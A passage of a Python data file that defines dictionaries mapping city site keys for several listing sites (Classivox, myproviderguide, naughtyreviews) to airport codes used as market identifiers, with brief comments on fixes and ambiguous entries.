"keys": "EYW",
"killeen": "GRK",
"kingston": "YGK",
"kirksville": "IRK",
"kitchener": "YKF",
"klamath": "LMT",
"knoxville": "TYS",
"kokomo": "OKK",
"kolkata": "CCU",
"kpr": "PSC",
"ksu": "MHK",
"kuwait": "KWI",
"lacrosse": "LSE",
"lafayette": "LFT",
"lakecharles": "LCH",
"lakecity": "LCQ",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"lapaz": "LPB",
"laredo": "LRD",
"lasalle": "VYS",
"lascruces": "LRU",
"lasvegas": "LAS",
"lausanne": "",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"leipzig": "LEJ",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lille": "LIL",
"lima": "LIM",
"limaohio": "AOH",
"lincoln": "LNK",
"lisbon": "LIS",
"littlerock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"loire": "NTE",
"london": "LHR",
"londonon": "YXU",
"longisland": "ISP",
"losangeles": "LAX",
"louisville": "SDF",
"loz": "AIZ",
"lubbock": "LBB",
"lucknow": "LKO",
"luxembourg": "LUX",
"lynchburg": "LYH",
"lyon": "LYS",
"macon": "MCN",
"madison": "MSN",
"madrid": "MAD",
"maine": "PWM",
"malaga": "AGP",
"malaysia": "KUL",
"managua": "MGA",
"manchester": "MAN",
"manila": "MNL",
"mankato": "MKT",
"mansfield": "MFD",
"marseilles": "MRS",
"marshall": "MML",
"martinsburg": "MRB",
"masoncity": "MCW",
"mattoon": "MTO",
"mazatlan": "MZT",
"mcallen": "MFE",
"meadville": "GKJ",
"medford": "MFR",
"melbourne": "MEL",
"memphis": "MEM",
"mendocino": "UKI",
"merced": "MCE",
"meridian": "MEI",
"mexicocity": "MEX",
"miami": "MIA",
"micronesia": "GUM",
"milan": "MXP",
"milwaukee": "MKE",
"minneapolis": "MSP",
"missoula": "MSO",
"mobile": "MOB",
"modesto": "MOD",
"mohave": "IFP",
"monroe": "MLU",
"monroemi": "TTF",
"montana": "GDV",
"monterey": "MRY",
"monterrey": "MTY",
"montevideo": "MVD",
"montgomery": "MGM",
"montpellier": "MPL",
"montreal": "YUL",
"morgantown": "MGW",
"moscow": "SVO",
"moseslake": "MWH",
"mumbai": "BOM",
"muncie": "MIE",
"munich": "MUC",
"muskegon": "MKG",
"myrtlebeach": "MYR",
"nacogdoches": "OCH",
"naga": "WNP",
"nagoya": "NGO",
"nanaimo": "YCD",
"nanjing": "NKG",
"naples": "NAP",
"nashville": "BNA",
"natchez": "HEZ",
"nd": "MOT",
"nesd": "ATY",
"newbrunswick": "YQM",
"newcastle": "NCL",
"newfoundland": "YYT",
"newhaven": "HVN",
"newjersey": "EWR",
"newlondon": "GON",
"neworleans": "MSY",
"newyork": "JFK",
"nh": "MHT",
"niagara": "YCM",
"nmi": "TVC",
"norfolk": "ORF",
"northernwi": "EAU",
"northmiss": "TUP",
"northplatte": "LBF",
"norwich": "NWI",
"nottingham": "NQT",
"ntl": "NTL",
"nuremberg": "NUE",
"nwct": "DXR",
"nwga": "RMG",
"nwks": "GLD",
"oaxaca": "OAX",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"okaloosa": "VPS",
"okinawa": "OKA",
"oklahomacity": "OKC",
"olympic": "CLM",
"omaha": "OMA",
"oneonta": "ONH",
"onslow": "OAJ",
"orangecounty": "SNA",
"oregoncoast": "ONP",
"orlando": "MCO",
"osaka": "KIX",
"oslo": "OSL",
"ottawa": "YOW",
"ottumwa": "OTM",
"outerbanks": "FFA",
"owensboro": "OWB",
"owensound": "YOS",
"oxford": "OXF",
"pakistan": "KHI",
"palmsprings": "PSP",
"pampanga": "CRK",
"panama": "PAC",
"panamacity": "PFN",
"paris": "CDG",
"parkersburg": "PKB",
"peace": "YPE",
"pei": "YYG",
"pennstate": "UNV",
"pensacola": "PNS",
"peoria": "PIA",
"perth": "PER",
"perugia": "PEG",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"porthuron": "PHN",
"portland": "PDX",
"porto": "OPO",
"portoalegre": "POA",
"potsdam": "MSS",
"prague": "PRG",
"prescott": "PRC",
"pretoria": "PRY",
"princegeorge": "YXS",
"providence": "PVD",
"provo": "PVU",
"puebla": "PBC",
"pueblo": "PUB",
"puertorico": "SJU",
"pullman": "PUW",
"pune": "PNQ",
"pv": "PVR",
"quadcities": "MLI",
"quebec": "YQB",
"quincy": "UIN",
"quito": "UIO",
"racine": "RAC",
"raleigh": "RDU",
"ramallah": "JRS",
"rapidcity": "RAP",
"reading": "RDG",
"recife": "REC",
"reddeer": "YQF",
"redding": "RDD",
"regina": "YQR",
"rennes": "RNS",
"reno": "RNO",
"reykjavik": "RKV",
"richmond": "RIC",
"richmondin": "RID",
"rio": "GIG",
"rmn": "RST",
"roanoke": "ROA",
"rochester": "ROC",
"rockford": "RFD",
"rockies": "EGE",
"rome": "FCO",
"roseburg": "RBG",
"roswell": "ROW",
"rouen": "URO",
"sacramento": "SMF",
"saginaw": "MBS",
"saguenay": "YBG",
"salem": "SLE",
"salina": "SLN",
"saltlakecity": "SLC",
"salvador": "SSA",
"sanangelo": "SJT",
"sanantonio": "SAT",
"sandiego": "SAN",
"sandusky": "SKY",
"sanmarcos": "HYI",
"santabarbara": "SBA",
"santafe": "SAF",
"santamaria": "SMX",
"santiago": "SCL",
"santodomingo": "SDQ",
"saopaulo": "GRU",
"sapporo": "CTS",
"sarasota": "SRQ",
"sardinia": "CAG",
"sarnia": "YZR",
"saskatoon": "YXE",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"sd": "PIR",
"seattle": "SEA",
"seks": "FSK",
"semo": "CGI",
"sendai": "SDJ",
"seoul": "ICN",
"sevilla": "SVQ",
"sfbay": "SFO",
"shanghai": "SHA",
"sheboygan": "SBM",
"sheffield": "DSA",
"shenyang": "SHE",
"shenzhen": "SZX",
"sherbrooke": "YSC",
"shoals": "MSL",
"showlow": "SOW",
"shreveport": "SHV",
"sicily": "PMO",
"sierravista": "FHU",
"singapore": "SIN",
"siouxcity": "SUX",
"siouxfalls": "FSD",
"siskiyou": "SIY",
"skagit": "BVS",
"skeena": "YYD",
"slo": "SBP",
"smd": "2W6",
"soo": "YAM",
"southbend": "SBN",
"southcoast": "EWB",
"southjersey": "MIV",
"spacecoast": "TIX",
"spokane": "GEG",
"springfield": "SGF",
"springfieldil": "SPI",
"statesboro": "TBR",
"staugustine": "UST",
"stcloud": "STC",
"stgeorge": "SGU",
"stillwater": "SWO",
"stjoseph": "STJ",
"stlouis": "STL",
"stockholm": "ARN",
"stockton": "SCK",
"stpetersburg": "LED",
"strasbourg": "SXB",
"stuttgart": "STR",
"sudbury": "YSB",
"sunshine": "YHS",
"surat": "STV",
"susanville": "SVE",
"swks": "GCK",
"swmi": "BEH",
"swv": "BKW",
"swva": "MKJ",
"sydney": "SYD",
"syracuse": "SYR",
"taipei": "TPE",
"tallahassee": "TLH",
"tampa": "TPA",
"tehran": "IKA",
"telaviv": "TLV",
"terrehaute": "HUF",
"territories": "YZF",
"texarkana": "TXK",
"texoma": "GYI",
"thumb": "PHN",
"thunderbay": "YQT",
"tijuana": "TIJ",
"tippecanoe": "LAF",
"tokyo": "NRT",
"toledo": "TOL",
"topeka": "FOE",
"torino": "TRN",
"toronto": "YYZ",
"toulouse": "TLS",
"treasure": "VRB",
"tricities": "TRI",
"troisrivieres": "YRQ",
"tucson": "TUS",
"tulsa": "TUL",
"tunis": "TUN",
"tuscaloosa": "TCL",
"tuscarawas": "PHD",
"twinfalls": "TWF",
"twintiers": "OLE",
"ukraine": "IEV",
"up": "MQT",
"utica": "UCA",
"valdosta": "VLD",
"valencia": "VLC",
"vancouver": "YVR",
"venice": "VCE",
"ventura": "OXR",
"veracruz": "VER",
"victoria": "YYJ",
"victoriatx": "VCT",
"vienna": "VIE",
"vietnam": "SGN",
"virgin": "STT",
"visalia": "VIS",
"waco": "ACT",
"warsaw": "WAW",
"washingtondc": "IAD",
"waterloo": "ALO",
"watertown": "ART",
"wausau": "AUW",
"wellington": "WLG",
"wenatchee": "EAT",
"westernmass": "CEF",
"westky": "PAH",
"westmd": "CBE",
"westslope": "GJT",
"wheeling": "HLG",
"whistler": "YWS",
"whitehorse": "YXY",
"wichita": "ICT",
"wichitafalls": "SPS",
"williamsport": "IPT",
"wilmington": "ILM",
"winchester": "OKV",
"windsor": "YQG",
"winnipeg": "YWG",
"winstonsalem": "INT",
"wollongong": "WOL",
"worcester": "ORH",
"wuhan": "WUH",
"wv": "CRW",
"wyoming": "CPR",
"xian": "XIY",
"yakima": "YKM",
"yellowknife": "YZF",
"york": "THV",
"youngstown": "YNG",
"yubasutter": "MYV",
"yucatan": "MID",
"yuma": "YUM",
"zagreb": "ZAG",
"zamboanga": "ZAM",
"zanesville": "ZZV"}
# classivox_sitekey_to_marketid
# Maps a Classivox site key (hyphenated city slug) to the IATA code of the
# market's primary airport, used as the market identifier.
# Fix: "lafayette-la" previously mapped to "LAF" (Purdue University Airport,
# Lafayette IN); Lafayette, Louisiana is "LFT", matching the other site-key
# maps in this file.
# NOTE(review): "richmond" -> "RID" (Richmond, Indiana) and "wilmington" ->
# "ILG" (Wilmington, Delaware) look intentional for this site's keys but
# differ from the sibling maps — confirm against the Classivox site list.
classivox_sitekey_to_marketid = {
"abilene": "ABI",
"akron": "CAK",
"albany": "ALB",
"albany-ga": "ABY",
"albuquerque": "ABQ",
"altoona": "AOO",
"amarillo": "AMA",
"ames": "AMW",
"anchorage": "ANC",
"ann-arbor": "ARB",
"annapolis": "ANP",
"appleton": "ATW",
"asheville": "AVL",
"ashtabula": "HZY",
"athens": "AHN",
"athens-oh": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"baton-rouge": "BTR",
"battle-creek": "AZO",
"beaumont": "BPT",
"bellingham": "BLI",
"bemidji": "BJI",
"bend": "RDM",
"billings": "BIL",
"binghamton": "BGM",
"birmingham-al": "BHM",
"bismarck": "BIS",
"bloomington": "BMI",
"bloomington-in": "BMG",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowling-green": "BWG",
"bozeman": "BZN",
"broward-county": "MIA",
"brownsville": "BRO",
"brunswick": "BQK",
"buffalo": "BUF",
"burlington": "BTV",
"calgary": "YYC",
"cape-cod": "PVC",
"catskills": "20N",
"cedar-rapids": "CID",
"central-mi": "LAN",
"central-nj": "47N",
"charleston": "CHS",
"charleston-wv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chicago": "ORD",
"chico": "CIC",
"chillicothe": "RZT",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"clovis": "CVN",
"college-station": "CLL",
"colorado-springs": "COS",
"columbia": "COU",
"columbia-sc": "CAE",
"columbus": "CMH",
"columbus-oh": "CMH",
"comox-valley": "YQQ",
"cookeville": "SRB",
"corpus-christi": "CRP",
"corvallis": "CVO",
"cumberland": "CBE",
"dallas-ft-worth": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona-beach": "DAB",
"decatur": "DEC",
"del-rio": "DRT",
"delaware": "ILG",
"denver": "DEN",
"des-moines": "DSM",
"detroit": "DTW",
"dothan": "DHN",
"dubuque": "DBQ",
"duluth": "DLH",
"east-oregon": "PDT",
"eastern-co": "LIC",
"eastern-ct": "GON",
"eastern-ky": "PBX",
"eastern-nc": "PGV",
"eastern-panhandle": "MRB",
"eastern-shore": "SBY",
"eau-claire": "EAU",
"edmonton": "YEG",
"el-paso": "ELP",
"elko": "EKO",
"elmira": "ELM",
"erie": "ERI",
"eugene": "EUG",
"evansville": "EVV",
"fairbanks": "FAI",
"fargo": "FAR",
"farmington": "FMN",
"fayetteville": "XNA",
"fayetteville-nc": "FAY",
"flagstaff-sedona": "FLG",
"flint": "FNT",
"florence": "FLO",
"florence-muscle-shoals": "MSL",
"florida-keys": "EYW",
"fort-collins": "FNL",
"fort-dodge": "FOD",
"fort-lauderdale": "FLL",
"fort-smith": "FSM",
"fort-wayne": "FWA",
"frederick": "FDK",
"fredericksburg-va": "EZF",
"fresno-madera": "FAT",
"ft-mcmurray": "YMM",
"gadsden-anniston": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glens-falls": "GFL",
"gold-country": "O22",
"grand-forks": "GFK",
"grand-island": "GRI",
"grand-rapids": "GRR",
"green-bay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"gulfport": "GPT",
"hamilton-burlington": "YHM",
"hampton-roads": "ORF",
"hanford-corcoran": "HJO",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"high-rockies": "EGE",
"hilton-head": "HHH",
"holland": "BIV",
"honolulu": "HNL",
"houma": "HUM",
"houston": "IAH",
"hudson-valley": "SWF",
"humboldt-county": "ACV",
"huntington": "HTS",
"huntsville-decatur": "HSV",
"imperial-county": "IPL",
"indianapolis": "IND",
"inland-empire": "ONT",
"iowa-city": "IOW",
"ithaca": "ITH",
"jackson": "JAN",
"jackson-tn": "MKL",
"jacksonville": "JAX",
"jacksonville-nc": "OAJ",
"janesville": "JVL",
"jersey-shore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kansas-city": "MCI",
"kenai-peninsula": "ENA",
"kennewick": "PSC",
"kenosha": "RAC",
"killeen": "GRK",
"kirksville": "IRK",
"klamath-falls": "LMT",
"knoxville": "TYS",
"kokomo": "OKK",
"lafayette": "LAF",
"lafayette-la": "LFT",
"lakeland": "LAL",
"lancaster": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"las-cruces": "LRU",
"las-vegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"lehigh-valley": "ABE",
"lethbridge": "YQL",
"lewiston": "LWS",
"lexington": "LEX",
"lima-oh": "AOH",
"lincoln": "LNK",
"little-rock": "LIT",
"logan": "LGU",
"london-on": "YXU",
"long-island": "ISP",
"los-angeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"maine": "PWM",
"manhattan": "JFK",
"mankato": "MKT",
"mansfield": "MFD",
"mason-city": "MCW",
"mattoon": "MTO",
"mcallen": "MFE",
"medford": "MFR",
"medicine-hat": "YXH",
"memphis": "MEM",
"mendocino-county": "UKI",
"merced": "MCE",
"miami-dade": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"mobile": "MOB",
"modesto": "MOD",
"mohave-county": "IFP",
"monroe": "MLU",
"monroe-mi": "TTF",
"monterey-bay": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"moses-lake": "MWH",
"muncie": "MIE",
"muskegon": "MKG",
"myrtle-beach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"new-hampshire": "MHT",
"new-haven": "HVN",
"new-orleans": "MSY",
"new-river-valley": "BCB",
"new-york-city": "JFK",
"niagara": "YCM",
"north-dakota": "FAR",
"north-jersey": "EWR",
"north-ms": "TUP",
"north-panhandle": "HLG",
"north-platte": "LBF",
"northern-mi": "TVC",
"northern-wi": "EAU",
"northwest-ct": "DXR",
"northwest-ga": "RMG",
"ocala": "OCF",
"odessa": "MAF",
"ogden": "OGD",
"okaloosa": "VPS",
"oklahoma-city": "OKC",
"old-west-virginia": "CRW",
"omaha": "OMA",
"oneonta": "ONH",
"orange-county": "SNA",
"oregon-coast": "ONP",
"orlando": "MCO",
"outer-banks": "FFA",
"owen-sound": "YOS",
"owensboro": "OWB",
"ozarks": "AIZ",
"palm-beach-county": "PBI",
"palm-springs": "PSP",
"panama-city": "PFN",
"parkersburg": "PKB",
"peace-river-country": "YPE",
"pensacola": "PNS",
"peoria": "PIA",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh": "PBG",
"poconos": "MPO",
"portland": "PDX",
"potsdam": "MSS",
"prescott": "PRC",
"provo": "PVU",
"pueblo": "PUB",
"pullman": "PUW",
"quad-cities": "MLI",
"quebec-city": "YQB",
"queens": "JFK",
"raleigh": "RDU",
"reading": "RDG",
"red-deer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RID",
"roanoke": "ROA",
"rochester": "RST",
"rochester-ny": "ROC",
"rockford": "RFD",
"roseburg": "RBG",
"roswell": "ROW",
"sacramento": "SMF",
"saginaw": "MBS",
"salem": "SLE",
"salina": "SLN",
"salt-lake-city": "SLC",
"san-angelo": "SJT",
"san-antonio": "SAT",
"san-diego": "SAN",
"san-francisco": "SFO",
"san-luis-obispo": "SBP",
"san-marcos": "HYI",
"sandusky": "SKY",
"santa-barbara": "SBA",
"santa-fe": "SAF",
"santa-maria": "SMX",
"sarasota": "SRQ",
"savannah": "SAV",
"scottsbluff": "BFF",
"scranton": "AVP",
"seattle-tacoma": "SEA",
"sheboygan": "SBM",
"show-low": "SOW",
"shreveport": "SHV",
"sierra-vista": "FHU",
"sioux-city": "SUX",
"siskiyou-county": "SIY",
"south-bend": "SBN",
"south-coast": "EWB",
"south-dakota": "PIR",
"south-jersey": "MIV",
"south-wv": "BKW",
"southeast-alaska": "JNU",
"southeast-mo": "CGI",
"southern-il": "MDH",
"southern-md": "2W6",
"southwest-mn": "MML",
"southwest-va": "MKJ",
"space-coast": "TIX",
"spokane": "GEG",
"springfield": "SPI",
"springfield-mo": "SGF",
"st-augustine": "UST",
"st-cloud": "STC",
"st-george": "SGU",
"st-joseph": "STJ",
"st-louis": "STL",
"state-college": "UNV",
"statesboro": "TBR",
"stillwater": "SWO",
"stockton": "SCK",
"susanville": "SVE",
"syracuse": "SYR",
"tallahassee": "TLH",
"tampa-bay": "TPA",
"terre-haute": "HUF",
"texarkana": "TXK",
"texoma": "GYI",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasure-coast": "VRB",
"tri-cities": "TRI",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"twin-falls": "TWF",
"tyler": "TYR",
"utica": "UCA",
"valdosta": "VLD",
"ventura-county": "OXR",
"victoria-tx": "VCT",
"visalia-tulare": "VIS",
"waco": "ACT",
"washington-dc": "IAD",
"waterloo": "YKF",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"west-palm-beach": "PBI",
"western-il": "UIN",
"western-ky": "PAH",
"western-ma": "CEF",
"western-md": "CBE",
"western-slope": "GJT",
"wichita": "ICT",
"wichita-falls": "SPS",
"williamsport": "IPT",
"wilmington": "ILG",
"winchester": "OKV",
"winnipeg": "YWG",
"winston-salem": "INT",
"worcester": "ORH",
"yakima": "YKM",
"york": "THV",
"youngstown": "YNG",
"yuma": "YUM",
"zanesville": "ZZV"}
# myproviderguide_sitekey_to_marketid
myproviderguide_sitekey_to_marketid = {
"abilene": "ABI",
"akron": "CAK",
"albany": "ALB",
"albuquerque": "ABQ",
"allentown": "ABE",
"altoona": "AOO",
"amarillo": "AMA",
"ames-ia": "AMW",
"amsterdam": "AMS",
"ann-arbor": "ARB",
"annapolis": "ANP",
"appleton": "ATW",
"asheville": "AVL",
"athens-ga": "AHN",
"athens-oh": "ATO",
"atlanta": "ATL",
"auburn": "AUO",
"augusta": "AGS",
"austin": "AUS",
"bakersfield": "BFL",
"baltimore": "BWI",
"barrie": "QEB",
"bath": "BRS",
"baton-rouge": "BTR",
"beaumont": "BPT",
"belfast": "BFS",
"belleville": "YTR",
"bellingham": "BLI",
"bend": "RDM",
"berlin": "TXL",
"biloxi": "GPT",
"binghamton": "BGM",
"birmingham": "BHM",
"birmingham-uk": "BHX",
"bismarck": "BIS",
"blacksburg": "BCB",
"bloomington": "BMG",
"bloomington-normal": "BMI",
"boise": "BOI",
"boone": "NC06",
"boston": "BOS",
"boulder": "WBU",
"bowling-green": "BWG",
"brighton": "ESH",
"bristol": "BRS",
"bronx": "JFK",
"brooklyn": "JFK",
"brunswick-ga": "BQK",
"brussels": "BRU",
"budapest": "BUD",
"buffalo": "BUF",
"calgary": "YYC",
"cambridge": "CBG",
"cape-cod": "PVC",
"carbondale": "MDH",
"cardiff": "CWL",
"catskills": "20N",
"cedar-rapids": "CID",
"central-jersey": "47N",
"champaign": "CMI",
"charleston-sc": "CHS",
"charleston-wv": "CRW",
"charlotte": "CLT",
"charlottesville": "CHO",
"chatham": "XCM",
"chattanooga": "CHA",
"chautauqua": "JHW",
"chicago": "ORD",
"chico": "CIC",
"cincinnati": "CVG",
"clarksville": "CKV",
"cleveland": "CLE",
"colorado-springs": "COS",
"columbia-sc": "CAE",
"columbus": "CMH",
"columbus-ga": "CSG",
"copenhagen": "CPH",
"cornwall": "YCC",
"corpus-christi": "CRP",
"corvallis": "CVO",
"coventry": "CVT",
"cranbrook": "YXC",
"dallas": "DFW",
"danville": "DAN",
"dayton": "DAY",
"daytona-beach": "DAB",
"decatur-il": "DEC",
"delaware": "ILG",
"denton": "DFW",
"denver": "DEN",
"derby": "EMA",
"des-moines": "DSM",
"detroit": "DTW",
"devon": "EXT",
"dothan-al": "DHN",
"dublin": "DUB",
"dubuque": "DBQ",
"duluth": "DLH",
"dundee": "DND",
"eau-claire": "EAU",
"edinburgh": "EDI",
"edmonton": "YEG",
"elmira-corning": "ELM",
"erie-pa": "ERI",
"essex": "STN",
"eugene": "EUG",
"evansville": "EVV",
"fargo": "FAR",
"farmington-nm": "FMN",
"fayetteville": "FAY",
"fayetteville-ar": "XNA",
"flagstaff": "FLG",
"flint": "FNT",
"florence": "FLO",
"florence-sc": "FLO",
"florida-keys": "EYW",
"fort-collins": "FNL",
"fort-lauderdale": "FLL",
"fort-myers": "RSW",
"fort-smith-ar": "FSM",
"fort-wayne": "FWA",
"fort-worth": "DFW",
"fredericksburg": "EZF",
"fresno": "FAT",
"gadsden-anniston": "GAD",
"gainesville": "GNV",
"galveston": "GLS",
"glasgow": "GLA",
"gold-country": "O22",
"grand-island": "GRI",
"grand-rapids": "GRR",
"green-bay": "GRB",
"greensboro": "GSO",
"greenville": "GSP",
"guelph": "CNC4",
"halifax": "YHZ",
"hamilton": "YHM",
"hampshire": "SOU",
"hampton": "ORF",
"harrisburg": "MDT",
"harrisonburg": "SHD",
"hartford": "HFD",
"hattiesburg": "HBG",
"hickory": "HKY",
"hilton-head": "HHH",
"honolulu": "HNL",
"houston": "IAH",
"hudson-valley": "SWF",
"humboldt-county": "ACV",
"huntington-ashland": "HTS",
"huntsville": "HSV",
"imperial-county": "IPL",
"indianapolis": "IND",
"inland-empire": "ONT",
"iowa-city": "IOW",
"ithaca": "ITH",
"jackson-mi": "JXN",
"jackson-ms": "JAN",
"jackson-tn": "MKL",
"jacksonville": "JAX",
"janesville": "JVL",
"jersey-shore": "ACY",
"jonesboro": "JBR",
"joplin": "JLN",
"kalamazoo": "AZO",
"kamloops": "YKA",
"kansas-city": "MCI",
"kelowna": "YLW",
"kennewick-pasco-richland": "PSC",
"kenosha-racine": "RAC",
"kent": "LYX",
"killeen": "GRK",
"kingston": "YGK",
"kitchener": "YKF",
"knoxville": "TYS",
"la-crosse": "LSE",
"lafayette": "LFT",
"lake-charles": "LCH",
"lakeland": "LAL",
"lancaster-pa": "LNS",
"lansing": "LAN",
"laredo": "LRD",
"las-vegas": "LAS",
"lawrence": "LWC",
"lawton": "LAW",
"leeds": "LBA",
"lehigh-valley": "ABE",
"lethbridge": "YQL",
"lexington-ky": "LEX",
"lima": "AOH",
"lincoln": "LNK",
"little-rock": "LIT",
"liverpool": "LPL",
"logan": "LGU",
"london": "LHR",
"london-canada": "YXU",
"long-island": "ISP",
"los-angeles": "LAX",
"louisville": "SDF",
"lubbock": "LBB",
"lynchburg": "LYH",
"macon": "MCN",
"madison": "MSN",
"maine": "PWM",
"manchester": "MAN",
"manhattan-ks": "MHK",
"mankato": "MKT",
"mansfield": "MFD",
"martinsburg": "MRB",
"medford-ashland-klamath": "MFR",
"memphis": "MEM",
"mendocino-county": "UKI",
"merced": "MCE",
"miami": "MIA",
"milwaukee": "MKE",
"minneapolis": "MSP",
"minot": "MOT",
"mobile": "MOB",
"modesto": "MOD",
"mohave-county": "IFP",
"monroe-la": "MLU",
"montana": "HLN",
"monterey-bay": "MRY",
"montgomery": "MGM",
"montreal": "YUL",
"morgantown": "MGW",
"mumbai": "BOM",
"muncie": "MIE",
"munich": "MUC",
"muskegon": "MKG",
"myrtle-beach": "MYR",
"nanaimo": "YCD",
"nashville": "BNA",
"new-brunswick": "YQM",
"new-delhi": "DEL",
"new-hampshire": "MHT",
"new-haven": "HVN",
"new-orleans": "MSY",
"new-york": "JFK",
"newcastle": "NCL",
"newfoundland": "YYT",
"niagara": "YCM",
"norfolk": "ORF",
"north-dakota": "FAR",
"north-jersey": "EWR",
"norwich": "NWI",
"nottingham": "NQT",
"oakland": "OAK",
"ocala": "OCF",
"odessa": "MAF",
"ogden-clearfield": "OGD",
"oklahoma-city": "OKC",
"omaha": "OMA",
"orange-county": "SNA",
"orlando": "MCO",
"oslo": "OSL",
"ottawa": "YOW",
"outer-banks": "FFA",
"owen-sound": "YOS",
"oxford": "OXF",
"palm-springs-ca": "PSP",
"panama-city-fl": "PFN",
"paris": "CDG",
"parkersburg-marietta": "PKB",
"pensacola": "PNS",
"peoria": "PIA",
"peterborough": "YPQ",
"philadelphia": "PHL",
"phoenix": "PHX",
"pittsburgh": "PIT",
"plattsburgh-adirondacks": "PBG",
"poconos": "MPO",
"port-huron": "PHN",
"portland": "PDX",
"prescott": "PRC",
"prince-george": "YXS",
"providence": "PVD",
"provo": "PVU",
"pueblo": "PUB",
"pullman": "PUW",
"quebec": "YQB",
"queens": "JFK",
"raleigh": "RDU",
"reading": "RDG",
"red-deer": "YQF",
"redding": "RDD",
"regina": "YQR",
"reno": "RNO",
"richmond": "RIC",
"roanoke": "ROA",
"rochester-mn": "RST",
"rochester-ny": "ROC",
"rockford": "RFD",
"rocky-mountains": "EGE",
"roseburg": "RBG",
"roswell": "ROW",
"sacramento": "SMF",
"saginaw-midland-baycity": "MBS",
"saguenay": "YBG",
"saint-louis": "STL",
"salem-or": "SLE",
"salt-lake-city": "SLC",
"san-antonio": "SAT",
"san-diego": "SAN",
"san-fernando-valley": "BUR",
"san-francisco": "SFO",
"san-jose": "SJC",
"san-luis-obispo": "SBP",
"san-marcos": "HYI",
"sandusky": "SKY",
"santa-barbara": "SBA",
"santa-fe": "SAF",
"sarasota-bradenton": "SRQ",
"sarnia": "YZR",
"saskatchewan": "YXE",
"savannah": "SAV",
"scranton": "AVP",
"seattle": "SEA",
"sheboygan-wi": "SBM",
"sheffield": "DSA",
"sherbrooke": "YSC",
"shreveport": "SHV",
"sierra-vista": "FHU",
"sioux-city-ia": "SUX",
"skagit": "BVS",
"south-bend": "SBN",
"south-dakota": "PIR",
"south-jersey": "MIV",
"space-coast": "TIX",
"spokane": "GEG",
"springfield-il": "SPI",
"springfield-ma": "CEF",
"springfield-mo": "SGF",
"st-augustine": "UST",
"st-cloud": "STC",
"st-george": "SGU",
"stillwater": "SWO",
"stockton": "SCK",
"sudbury": "YSB",
"syracuse": "SYR",
"tallahassee": "TLH",
"tampa": "TPA",
"terre-haute": "HUF",
"territories": "YZF",
"texarkana": "TXK",
"thunder-bay": "YQT",
"toledo": "TOL",
"topeka": "FOE",
"toronto": "YYZ",
"treasure-coast": "VRB",
"tucson": "TUS",
"tulsa": "TUL",
"tuscaloosa": "TCL",
"twin-falls": "TWF",
"tyler": "TYR",
"utica": "UCA",
"valdosta": "VLD",
"vancouver": "YVR",
"ventura-county": "OXR",
"vermont": "BTV",
"victoria": "YYJ",
"victoria-tx": "VCT",
"virginia-beach": "ORF",
"visalia-tulare": "VIS",
"waco": "ACT",
"washington-dc": "IAD",
"waterloo": "ALO",
"watertown": "ART",
"wausau": "AUW",
"wenatchee": "EAT",
"west-palm-beach": "PBI",
"wheeling-wv": "HLG",
"whistler": "YWS",
"wichita": "ICT",
"wichita-falls": "SPS",
"williamsport": "IPT",
"wilmington-nc": "ILM",
"windsor": "YQG",
"winnipeg": "YWG",
"winston-salem": "INT",
"worcester": "ORH",
"wyoming": "CPR",
"yakima": "YKM",
"york-pa": "THV",
"youngstown": "YNG",
"yuba-sutter": "MYV",
"yuma": "YUM"}
# naughtyreviews_sitekey_to_marketid
# Maps naughtyreviews site keys — tokenized, lower-cased city names as 1-3 word
# tuples (a trailing comma marks every tuple explicitly) — to IATA-style market
# identifiers.  Entries commented "ambiguous" are deliberately unmapped because
# the bare city name matches more than one market.
naughtyreviews_sitekey_to_marketid = {
("london",): "LHR",
# springfield ambiguous
("toronto",): "YYZ",
("detroit",): "DTW",
("atlanta",): "ATL",
("phoenix",): "PHX",
("dallas",): "DFW",
# columbus ambiguous
("portland",): "PDX",
("vancouver",): "YVR",
("miami",): "MIA",
("boston",): "BOS",
# birmingham ambiguous
("denver",): "DEN",
# columbia ambiguous
("houston",): "IAH",
("tampa",): "TPA",
# manchester ambiguous
("cleveland",): "CLE",
# charleston ambiguous
# wilmington ambiguous
("orlando",): "MCO",
("minneapolis",): "MSP",
("chicago",): "ORD",
("indianapolis",): "IND",
# rochester ambiguous
("pittsburgh",): "PIT",
("sacramento",): "SMF",
("cincinnati",): "CVG",
("paris",): "CDG",
# lafayette ambiguous
("nashville",): "BNA",
("baltimore",): "BWI",
("louisville",): "SDF",
("austin",): "AUS",
# fayetteville ambiguous
("cambridge",): "CBG",
("philadelphia",): "PHL",
("seattle",): "SEA",
